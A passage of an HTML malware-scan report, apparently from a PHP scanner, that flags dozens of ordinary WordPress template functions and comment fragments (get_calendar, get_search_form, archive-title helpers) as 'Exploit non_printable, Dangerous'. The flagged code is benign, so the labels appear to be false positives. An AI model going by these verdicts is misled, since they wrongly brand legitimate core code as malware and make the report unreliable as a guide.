</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1520</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">post_type_archive_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1562</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_cat_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">single_term_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1579</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_tag_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1596</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_term_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1641</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">. </span><span style="color: #0000BB">$term_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1659</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">false</span><span style="color: #007700">|</span><span style="color: #0000BB">void False </span><span style="color: #007700">if </span><span style="color: #0000BB">there</span><span style="color: #DD0000">'s no valid title for the month. Title when retrieving.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">single_month_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$display </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_template_part</span><span style="color: #007700">( </span><span style="color: #0000BB">$slug</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1698</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_archive_title</span><span style="color: #007700">( </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1712</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Archive title</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1714</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_archive_title</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_archive_title'</span><span style="color: #007700">, </span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$original_title</span><span style="color: #007700">, </span><span style="color: #0000BB">$prefix </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_archive_description</span><span style="color: #007700">( </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1833</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string Archive description</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1835</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_archive_description</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1851</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_archive_description'</span><span style="color: #007700">, </span><span style="color: #0000BB">$description </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The post type description</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1862</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_the_post_type_description</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1886</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_the_post_type_description'</span><span style="color: #007700">, </span><span style="color: #0000BB">$description</span><span style="color: #007700">, </span><span style="color: #0000BB">$post_type_obj </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string HTML link content </span><span style="color: #007700">for </span><span style="color: #0000BB">archive</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1924</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_archives_link</span><span style="color: #007700">( </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$format </span><span style="color: #007700">= </span><span style="color: #DD0000">'html'</span><span style="color: #007700">, </span><span style="color: #0000BB">$before </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$after </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$selected </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_archives_link'</span><span style="color: #007700">, </span><span style="color: #0000BB">$link_html</span><span style="color: #007700">, </span><span style="color: #0000BB">$url</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$format</span><span style="color: #007700">, </span><span style="color: #0000BB">$before</span><span style="color: #007700">, </span><span style="color: #0000BB">$after</span><span style="color: #007700">, </span><span style="color: #0000BB">$selected </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the links </span><span style="color: #007700">list. Default </span><span style="color: #0000BB">1</span><span style="color: #007700">|</span><span style="color: #0000BB">true to </span><span style="color: #007700">echo.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">archive links </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">is false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1998</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_get_archives</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">value was added</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is primarily used by themes which want to hardcode the search</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">float Days since the start of the week</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">calendar_week_mod</span><span style="color: #007700">( </span><span style="color: #0000BB">$num </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2228</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ( </span><span style="color: #0000BB">$num </span><span style="color: #007700">- </span><span style="color: #0000BB">$base </span><span style="color: #007700">* </span><span style="color: #0000BB">floor</span><span style="color: #007700">( </span><span style="color: #0000BB">$num </span><span style="color: #007700">/ </span><span style="color: #0000BB">$base </span><span style="color: #007700">) );</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is run called</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2255</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if `</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">calendar HTML </span><span style="color: #007700">if `</span><span style="color: #0000BB">$display</span><span style="color: #007700">` </span><span style="color: #0000BB">is false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2257</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_calendar</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2283</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">arguments before they are used</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">The arguments </span><span style="color: #007700">for </span><span style="color: #0000BB">the </span><span style="color: #007700">`</span><span style="color: #DD0000">get_calendar</span><span style="color: #007700">` function.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'s need to echo or return the output.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 234</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">the form</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">string Void </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">argument is true</span><span style="color: #007700">, </span><span style="color: #0000BB">search form HTML </span><span style="color: #007700">if </span><span style="color: #DD0000">'echo' </span><span style="color: #0000BB">is false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_search_form</span><span style="color: #007700">( </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2597</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$calendar_output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 25</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">void</span><span style="color: #007700">|</span><span style="color: #0000BB">false Void on success</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">the template does not exist</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">delete_get_calendar_cache</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 261</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function as </span><span style="color: #0000BB">expected</span><span style="color: #007700">, </span><span style="color: #0000BB">we handle a value </span><span style="color: #007700">for </span><span style="color: #0000BB">the boolean $echo param removed</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2621</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string HTML allowed tags entity encoded</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2623</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">allowed_tags</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">htmlentities</span><span style="color: #007700">( </span><span style="color: #0000BB">$allowed </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2645</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">the_date_xml</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2656</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is called several times </span><span style="color: #007700">for </span><span style="color: #0000BB">each post</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2669</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">it</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2670</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void String </span><span style="color: #007700">if </span><span style="color: #0000BB">retrieving</span><span style="color: #007700">.</span>
</span>
